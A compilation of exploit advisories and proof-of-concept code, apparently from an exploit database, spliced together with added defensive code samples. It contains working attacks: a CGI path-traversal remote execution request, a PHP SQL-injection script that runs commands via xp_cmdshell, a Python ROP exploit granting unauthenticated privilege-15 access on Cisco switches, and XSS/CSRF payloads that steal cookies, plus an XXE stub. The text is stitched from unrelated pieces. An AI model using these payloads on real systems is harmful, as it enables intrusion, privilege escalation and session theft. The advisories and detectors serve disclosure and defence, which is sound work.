# Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution
# Date: 26/05/2017
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore)
# Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html
# Version: 1.9.1 (build 164)
# Tested on: Windows 7 SP1 Family x64 (FR)
# Category: Webapps
"""
Disclosure Timeline:
--------------------
2017-05-26: Vulnerability discovered
2017-05-26: Vendor website is down, no way to contact him
Description:
-------------
Home Web Server allows CGI programs located in the /cgi-bin folder to be called via POST. However, by using a directory traversal
in the request path, it is possible to run any executable present on the remote host.
Instructions:
-------------
- Start Home Web Server.
- Run this exploit from a remote Kali machine with netcat as below.
"""
# Connect with netcat, then drop a single POST to call the executable you want
guillaume@kali:~/kiwi_syslog$ nc 10.0.0.100 80
POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1
# Returned response
HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 0
Server: My Web Server (HWS164)
"""
[CTRL+C] : this is important to launch the executable we requested
Calc.exe has been launched on the remote host.
"""
Software: Kronos Telestaff Web Application
Version: < 2.92EU29
Homepage: http://www.kronos.com/
CERT VU: VU#958480
CVE: (Pending)
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-89
Vulnerable Component: Login page
Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.
Vulnerabilities
================
The vulnerability is due to the unsanitized POST parameter 'user' in the login page:
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=
The exploit requires a valid "code" in the POST body. However, in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page. Furthermore, the "code" POST variable is very often a 4-digit number and can be easily discovered in ~5000 requests.
Proof of concept
================
PoC 1 - extract data from database
Example: extract benign data, e.g.
Injection Point: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POST data:
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
compare timing with
device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>
PoC 2 - Execute Code Remotely
Example: inject benign code, e.g. ping a remote system
<?php
$cmd_to_execute = strToHex("ping -n 1 receive_ping_host"); // insert your own host here to detect dns lookup and/or ping; or insert other command
$code = "XXXX"; // insert valid code
$target_url = ""; // insert login page url of target system i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
$payload = "DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
$payload = str_replace(" ", "%20", $payload);
$postdata = "device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_exec($ch);
curl_close($ch);

// hex-encode the command so it can be passed as a 0x... literal without quotes
function strToHex($string){
    $hex = '';
    for ($i = 0; $i < strlen($string); $i++){
        $ord = ord($string[$i]);
        $hexCode = dechex($ord);
        $hex .= substr('0'.$hexCode, -2);
    }
    return "0x".strtoupper($hex);
}
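To make the root cause and the fix concrete, here is an added example, not the advisory authors' code and not TeleStaff's, that contrasts a string-spliced login query with a parameterised one. It uses an in-memory sqlite3 database, which has no WAITFOR, so a boolean payload stands in for the advisory's time-delay one; the table, its row and the function names are constructed for the illustration.

```python
import sqlite3


def make_sample_db():
    """Constructed stand-in for the application's user table (not TeleStaff's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT NOT NULL, pwd TEXT NOT NULL)")
    conn.execute("INSERT INTO users (name, pwd) VALUES ('alice', 's3cret-sample')")
    conn.commit()
    return conn


def login_vulnerable(conn, user, pwd):
    """The defect: the 'user' value is spliced into the SQL text, so a quote
    and a closing parenthesis in it end the string literal and the comparison,
    exactly the shape the advisory's  ')...;--  payloads rely on."""
    sql = "SELECT id FROM users WHERE (name = '%s' AND pwd = '%s')" % (user, pwd)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, user, pwd):
    """The fix: a parameterised query. The driver hands values to the engine
    separately from the statement, so quotes, parentheses and comment markers
    inside 'user' are compared as data and never parsed as SQL."""
    sql = "SELECT id FROM users WHERE (name = ? AND pwd = ?)"
    row = conn.execute(sql, (user, pwd)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_sample_db()
    injected = "') OR 1=1 --"          # boolean equivalent of the advisory's timing payload
    print("vulnerable:", login_vulnerable(db, injected, ""))   # returns a user id without a password
    print("safe:      ", login_safe(db, injected, ""))         # returns None
```

Escaping or filtering the input is not an adequate substitute: the time-based form in PoC 1 needs no quotes in its result and no error message, which is why a blind injection of this kind survives output-side sanitisation and only parameterisation (or a strict allow-list for the value) removes it.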
Affected Systems
================
From Vendor:
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.
Solution
================
From Vendor:
Though there is no further action needed after the installation of the update there are a couple of best practices that we suggest to further secure the production environment.
1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses. For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.
Timeline
================
2015-12-18: Discovered
2016-01-04: Contacted Vendor
2016-01-11: Report sent to vendor
2016-01-20: Received acknowledgement of the vulnerability from the vendor's security contact
2016-01-20: Vendor is remediating the issue
2016-10-18: Vendor issues patch
2017-06-01: Public disclosure
Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
Mark F. Snodgrass 0x736e6f646772617373 [ at ] illumant.com
About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
Sources:
https://phoenhex.re/2017-06-02/arrayspread
https://github.com/phoenhex/files/blob/master/exploits/spread-overflow
JavaScriptCore will allocate a JSFixedArray for every spread operand of the array literal (in slow_path_spread). As such, roughly 4 billion JSValues will have to be allocated, taking up 32 GiB in RAM. Luckily, this isn’t much of a problem due to the page compression performed by the macOS kernel. It will, however, take roughly a minute to trigger the bug.
What is left to do now is to perform some heap feng-shui to place something interesting on the heap that we will then overflow into. We use the following heap spray to exploit the bug:
- Allocate 100 JSArrays of size 0x40000 and root them (i.e. keep references). This will trigger GC multiple times and fill up holes in the heap.
- Allocate 100 JSArrays of size 0x40000, where only every second one is rooted. This triggers GC and leaves holes of size 0x40000 in the heap.
- Allocate a larger JSArray and an ArrayBuffer of the same size. These end up directly after the spray from step 2.
- Allocate 4 GiB of padding using JSArrays.
- Trigger the bug by concatenating JSArrays with a combined size of 2^32 + 0x40000 (containing the repeated byte 0x41).
The target buffer will be allocated in the sprayed region from step 2 and the victim buffers from step 3 will be overwritten. This increases the size of the victim array to the sprayed value (0x4141414141414141), so that it overlaps with the victim ArrayBuffer. The final steps immediately yield the fakeobj and addrof primitives described in section 1.2 of the JavaScriptCore phrack paper which can then be used to write code to a JIT page and jump to it.
In our exploit we perform step 5 in a separate web worker, so that we can launch a second stage shellcode immediately after the victim arrays are overwritten. This way we do not need to wait for the full overwrite to finish, and the heap is only left in a broken state for a very short time, so that garbage collection does not crash (which runs concurrently starting from Safari version 10.1).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42125.zip
Source: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=13637
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3235-gd97ce76161)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.9-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1216
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
epan/wmem/wmem_map.c:419:57: runtime error: null pointer passed as argument 1, which is declared to never be null
/usr/include/string.h:395:33: note: nonnull attribute specified here
#0 0x7fb58924ef44 in wmem_str_hash epan/wmem/wmem_map.c:419:50
#1 0x7fb58924c175 in wmem_map_lookup epan/wmem/wmem_map.c:252:23
#2 0x7fb588c1e589 in ros_try_string ./asn1/ros/packet-ros-template.c:148:49
#3 0x7fb588c1e392 in call_ros_oid_callback ./asn1/ros/packet-ros-template.c:211:13
#4 0x7fb5887d9a35 in call_idmp_oid_callback ./asn1/idmp/packet-idmp-template.c:122:18
#5 0x7fb5887da428 in dissect_idmp_T_result ./asn1/idmp/packet-idmp-fn.c:229:9
#6 0x7fb585b43a53 in dissect_ber_sequence epan/dissectors/packet-ber.c:2399:17
#7 0x7fb5887d93fb in dissect_idmp_IdmResult ./asn1/idmp/packet-idmp-fn.c:245:12
#8 0x7fb585b4987e in dissect_ber_choice epan/dissectors/packet-ber.c:2901:21
#9 0x7fb5887d91cd in dissect_idmp_IDM_PDU ./asn1/idmp/packet-idmp-fn.c:415:12
#10 0x7fb5887d90dc in dissect_idmp ./asn1/idmp/packet-idmp-template.c:226:9
#11 0x7fb587b769bb in tcp_dissect_pdus epan/dissectors/packet-tcp.c:3505:13
#12 0x7fb5887d7b3c in dissect_idmp_tcp ./asn1/idmp/packet-idmp-template.c:244:5
#13 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#14 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#15 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#16 0x7fb587b78d2d in decode_tcp_ports epan/dissectors/packet-tcp.c:5430:9
#17 0x7fb587b8420b in process_tcp_payload epan/dissectors/packet-tcp.c:5499:13
#18 0x7fb587b7c30c in dissect_tcp_payload epan/dissectors/packet-tcp.c:5575:9
#19 0x7fb587ba2649 in dissect_tcp epan/dissectors/packet-tcp.c:6440:13
#20 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#21 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#22 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#23 0x7fb5869d32ac in ip_try_dissect epan/dissectors/packet-ip.c:1854:7
#24 0x7fb5869e2236 in dissect_ip_v4 epan/dissectors/packet-ip.c:2315:10
#25 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#26 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#27 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#28 0x7fb589484e09 in dissector_try_uint epan/packet.c:1353:9
#29 0x7fb586451733 in dissect_ethertype epan/dissectors/packet-ethertype.c:267:21
#30 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#31 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#32 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#33 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#34 0x7fb58644d90e in dissect_eth_common epan/dissectors/packet-eth.c:536:5
#35 0x7fb586443197 in dissect_eth epan/dissectors/packet-eth.c:800:5
#36 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#37 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#38 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#39 0x7fb586585b27 in dissect_frame epan/dissectors/packet-frame.c:521:11
#40 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#41 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#42 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#43 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#44 0x7fb58947a694 in dissect_record epan/packet.c:567:3
#45 0x7fb58940ae58 in epan_dissect_run_with_taps epan/epan.c:474:2
#46 0x564f18286ec6 in process_packet_single_pass tshark.c:3395:5
#47 0x564f1828009e in load_cap_file tshark.c:3232:11
#48 0x564f18277e7b in main tshark.c:1954:13
#49 0x7fb57af42510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#50 0x564f18165709 in _start (run/tshark+0xd1709)
SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42124.zip
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3369-g2e2ba64b72)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.13-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1303
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
wsutil/inet_ipv6.h:111:15: runtime error: member access within null pointer of type 'const struct e_in6_addr'
#0 0x7f2b8106b2b8 in in6_is_addr_multicast wsutil/inet_ipv6.h:111:15
#1 0x7f2b81068247 in dissect_routing6_rpl epan/dissectors/packet-ipv6.c:952:9
#2 0x7f2b81052227 in dissect_routing6 epan/dissectors/packet-ipv6.c:1217:9
#3 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#4 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#5 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#6 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#7 0x7f2b800c8361 in dissect_ayiya epan/dissectors/packet-ayiya.c:134:9
#8 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#9 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#10 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#11 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#12 0x7f2b822f9326 in decode_udp_ports epan/dissectors/packet-udp.c:678:7
#13 0x7f2b8230ee02 in dissect epan/dissectors/packet-udp.c:1131:5
#14 0x7f2b822fe12f in dissect_udp epan/dissectors/packet-udp.c:1137:3
#15 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#16 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#17 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#18 0x7f2b80a62252 in dissect_exported_pdu epan/dissectors/packet-exported_pdu.c:307:17
#19 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#20 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#21 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#22 0x7f2b80b803e7 in dissect_frame epan/dissectors/packet-frame.c:521:11
#23 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#24 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#25 0x7f2b83a9fe87 in call_dissector_only epan/packet.c:2992:8
#26 0x7f2b83a88034 in call_dissector_with_data epan/packet.c:3005:8
#27 0x7f2b83a87054 in dissect_record epan/packet.c:567:3
#28 0x7f2b83a1f398 in epan_dissect_run_with_taps epan/epan.c:474:2
#29 0x561364f21686 in process_packet_single_pass tshark.c:3419:5
#30 0x561364f1a821 in process_cap_file tshark.c:3250:11
#31 0x561364f12549 in main tshark.c:1955:17
#32 0x7f2b754f9510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#33 0x561364dff4f9 in _start (run/tshark+0xd44f9)
SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42123.zip
#!/usr/bin/python
# Author:
# Artem Kondratenko (@artkond)
import socket
import sys
from time import sleep
set_credless = True
if len(sys.argv) < 3:
    print sys.argv[0] + ' [host] --set/--unset'
    sys.exit()
elif sys.argv[2] == '--unset':
    set_credless = False
elif sys.argv[2] == '--set':
    pass
else:
    print sys.argv[0] + ' [host] --set/--unset'
    sys.exit()
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))
print '[+] Connection OK'
print '[+] Received bytes from telnet service:', repr(s.recv(1024))
#sleep(0.5)
print '[+] Sending cluster option'
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x2c\x8b\x74' # +8 address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
    payload += '\x00\x00\x99\x80' # +12 set address of func that rets 1
else:
    payload += '\x00\x04\xea\x58' # unset
payload += 'BBBB' # +16(+0) r1 points here at second gadget
payload += '\x00\xdf\xfb\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC' # +8
payload += 'DDDD' # +12
payload += 'EEEE' # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x78\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x2c\x8b\x60' # +8 r1+8 = 0x022c8b60
payload += 'FFFF' # +12
payload += 'GGGG' # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6b\xa1\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
    payload += '\x00\x12\x52\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
else:
    payload += '\x00\x04\xe6\xf0' # unset
payload += 'HHHH' # +12
payload += 'IIII' # +16(+0) r1 points here at fifth gadget
payload += '\x01\x48\xe5\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ' # +8 r1 points here at third gadget
payload += 'KKKK' # +12
payload += 'LLLL' # +16
payload += '\x01\x13\x31\xa8' # +20 original execution flow return addr
payload += ':15:' + '\xff\xf0'
s.send(payload)
print '[+] All done'
s.close()
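A defender's counterpart, added here and not part of the exploit above: a passive check that walks a captured Telnet byte stream, extracts every IAC SB ... IAC SE suboption, and flags option 0x24 suboptions whose CISCO_KITS value is far longer than any environment value should be, which is the shape of the payload the script builds. The 64-byte threshold and the sample streams are assumptions made for the illustration.

```python
# Telnet protocol bytes: Interpret As Command, Subnegotiation Begin/End.
IAC, SB, SE = 0xFF, 0xFA, 0xF0
CLUSTER_OPTION = 0x24          # option byte carried by the payload above
MARKER = b"CISCO_KITS"
MAX_VALUE_LEN = 64             # assumption: legitimate values are short

# Constructed sample streams (not captures from a real device).
SUSPICIOUS_STREAM = b"\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + b"A" * 200 + b":15:\xff\xf0"
BENIGN_STREAM = b"\xff\xfb\x18" + b"\xff\xfa\x24\x00\x03CISCO_KITS\x01abc\xff\xf0"


def iter_suboptions(stream):
    """Yield (option, body) for each complete IAC SB <option> ... IAC SE block."""
    pos = 0
    while True:
        start = stream.find(bytes([IAC, SB]), pos)
        if start < 0 or start + 2 >= len(stream):
            return
        end = stream.find(bytes([IAC, SE]), start + 3)
        if end < 0:
            return                       # truncated negotiation; nothing more to report
        yield stream[start + 2], stream[start + 3:end]
        pos = end + 2


def find_oversized_cluster_values(stream, max_len=MAX_VALUE_LEN):
    """Return [(option, value_length), ...] for suboptions that carry a
    CISCO_KITS value longer than max_len; an empty list means nothing suspicious."""
    findings = []
    for option, body in iter_suboptions(stream):
        if option != CLUSTER_OPTION or MARKER not in body:
            continue
        value = body.split(MARKER, 1)[1]
        if len(value) > max_len:
            findings.append((option, len(value)))
    return findings


if __name__ == "__main__":
    print("benign:    ", find_oversized_cluster_values(BENIGN_STREAM))
    print("suspicious:", find_oversized_cluster_values(SUSPICIOUS_STREAM))
```

The scanner treats the stream naively: it does not undo IAC doubling (0xff 0xff inside data) and does not reassemble across TCP segments, so in an IDS it belongs after stream reassembly. The useful property is that it keys on length, not on the specific gadget addresses, so a reordered or re-padded variant of the same overflow still trips it.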
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/BIND9-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
Vendor:
===========
www.isc.org
Product:
===========
BIND9
v9.10.5 x86 / x64
BIND is open source software that enables you to publish your Domain Name System (DNS) information on the Internet, and to resolve DNS
queries for your users. The name BIND stands for “Berkeley Internet Name Domain”, because the software originated in the early 1980s
at the University of California at Berkeley.
Vulnerability Type:
===================
Privilege Escalation
CVE Reference:
==============
CVE-2017-3141
Security Issue:
================
BIND installs as a service with an unquoted service path. To exploit it, a local attacker must place
a malicious executable file named "Program.exe" in the path of the service; if the service process runs under
an account other than the attacker's, it can be used to execute code under a different set of privileges.
C:\>sc qc named
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: named
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ISC BIND 9\bin\named.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ISC BIND
DEPENDENCIES :
SERVICE_START_NAME : .\named
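The `sc qc` output above is all an auditor needs to spot this class of issue. As an added example (not the advisory's or ISC's code), the following parses that output, decides whether BINARY_PATH_NAME is unquoted and contains spaces, lists the ambiguous paths the Windows loader would try in order (the first of which is the C:\Program.exe the advisory mentions), and produces the quoted path that should be configured instead. The sample output is reconstructed from the listing above.

```python
import re

# Reconstructed from the `sc qc named` listing in the advisory.
SC_QC_SAMPLE = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: named
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files\\ISC BIND 9\\bin\\named.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ISC BIND
        DEPENDENCIES       :
        SERVICE_START_NAME : .\\named
"""


def parse_sc_qc(output):
    """Turn `sc qc` output into a dict of FIELD_NAME -> value."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def is_unquoted_with_spaces(binary_path):
    """The misconfiguration: a path with spaces that is not wrapped in quotes."""
    return not binary_path.startswith('"') and " " in binary_path


def loader_search_order(binary_path):
    """Paths the Windows loader tries, in order, for an unquoted path with spaces:
    every space is a possible end of the executable name, and '.exe' is appended
    when the fragment has no extension. A quoted path is unambiguous."""
    if binary_path.startswith('"'):
        return [binary_path.split('"')[1]]
    parts = binary_path.split(" ")
    candidates = []
    for n in range(1, len(parts)):
        fragment = " ".join(parts[:n])
        candidates.append(fragment if fragment.lower().endswith(".exe") else fragment + ".exe")
    candidates.append(binary_path)
    return candidates


def audit_service(sc_output):
    """Return (vulnerable, binary_path, quoted_fix, candidates) for one service."""
    path = parse_sc_qc(sc_output).get("BINARY_PATH_NAME", "")
    vulnerable = is_unquoted_with_spaces(path)
    fix = '"%s"' % path if vulnerable else path
    candidates = loader_search_order(path) if vulnerable else []
    return vulnerable, path, fix, candidates


if __name__ == "__main__":
    vulnerable, path, fix, candidates = audit_service(SC_QC_SAMPLE)
    print("vulnerable:", vulnerable)
    for c in candidates:
        print("  loader would try:", c)
    print("configure instead:", fix)
```

The candidate list is what to review next: the issue is only exploitable if some non-administrative account can create a file at one of those locations, so check the ACLs on `C:\` and `C:\Program Files` for the host in question. The fix itself is to quote the path, for example `sc config named binPath= "\"C:\Program Files\ISC BIND 9\bin\named.exe\""`, after which `loader_search_order` returns the single intended executable.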
Network Access:
===============
Local
Severity:
=========
Medium
Disclosure Timeline:
==================================
Vendor Notification: May 13, 2017
Vendor confirm: May 14, 2017
June 4, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-PERSISTENT-XSS.txt
[+] ISR: ApparitionSec
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
======================
CSRF - Persistent XSS
CVE Reference:
==============
CVE-2017-9414
Security Issue:
================
Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads
if an authenticated user clicks a malicious link or visits an attacker controlled webpage.
Exploit/POC:
=============
<form action="http://localhost:4040/playerSettings.view" method="post">
<input name="playerId" type="hidden" value="1">
<input name="name" type="text" value="<script>alert('XSS ' +document.cookie)</script>">
<script>document.forms[0].submit()</script>
</form>
Then visit http://localhost:4040/index.view
HTTP Response:
XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl
Misc Reflected:
XSS 1
http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 2
http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 3
http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==================================
Vendor Notification: May 29, 2017
Vendor Acknowledgement: May 30, 2017
June 4, 2017 : Public Disclosure
hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-XML-EXTERNAL-ENITITY.txt
[+] ISR: ApparitionSec
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
====================
XML External Entity
CVE Reference:
==============
CVE-2017-9355
Security Issue:
================
The subsonic import playlist feature is susceptible to XML External Entity attack. To exploit it, a user must be tricked into
importing a malicious .XSPF playlist file. The XXE injection can be used to target various hosts on the internal network
to bypass the firewall, or hosts on the internet, as XML External Entity is related to Server Side Request Forgery (SSRF) attacks.
Exploit/POC:
=============
1) Create some playlist file "RainbowsNUnic0rns.xspf"
<?xml version="1.0"?>
<!DOCTYPE mmmmmRaisins [
<!ENTITY % mmmm SYSTEM "http://127.0.0.1:1337/">
